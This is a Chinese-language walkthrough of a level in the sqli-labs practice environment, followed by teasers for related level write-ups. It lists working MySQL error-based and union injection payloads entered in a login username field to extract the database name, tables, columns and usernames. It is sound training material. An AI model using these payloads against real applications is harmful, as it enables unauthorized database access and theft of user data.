本關為post請求:
輸入:admin『#
密碼:隨意
爆出當前資料庫:
使用者名稱:payload1:admin' and extractvalue(1,concat(0x7e,database(),0x7e))#
payload2:admin' and extractvalue(1,concat(0x7e,(select database()),0x7e))#
payload3:admin ' union select 1,database()#
密碼:隨意
爆資料表:
使用者名稱:payload1:admin' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e))#
密碼:隨意
爆資料列:
使用者名稱:payload1:admin' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='referers' limit 1,1),0x7e))#
密碼:隨意
爆資訊:
使用者名稱:payload1:admin' and extractvalue(1,concat(0x7e,(select username from referer limit 1,1),0x7e))#
密碼:隨意
Sqli labs master 5 6闖關遊戲
less 5 通過盲注 and 1 1 and 1 2 來構造sql語句,最終發現構造語句如下 這裡我們發現並沒有返回值,通過構造sql語句爆庫也沒有任何返回值 所以我們猜測這裡可能用報錯注入 在進行爆庫之前我們要先了解報錯注入要用到的函式 updatexml xml document,xpath ...
sqli labs master 闖關前知識點學習
1 前期準備 知識點 開始之前,為了方便檢視sql注入語句,我在sqli labs master網頁原始碼php部分加了兩行 第一行意思是輸出資料庫語句,第二行是換行符 一 mysql 登入 1 明文密碼 在bin目錄下 輸入 mysql u 賬戶 p 密碼 2 密碼 在bin目錄下 輸入 mysq...
sqli labs master 第二,三,四關
第二關 判斷注入型別 原因 sql select from users where id id limit 0,1 未對id做任何處理無須閉合 判斷列數 order by 3 判斷顯示位 爆出資料庫 union select 1 group concat schema name 3 from inf...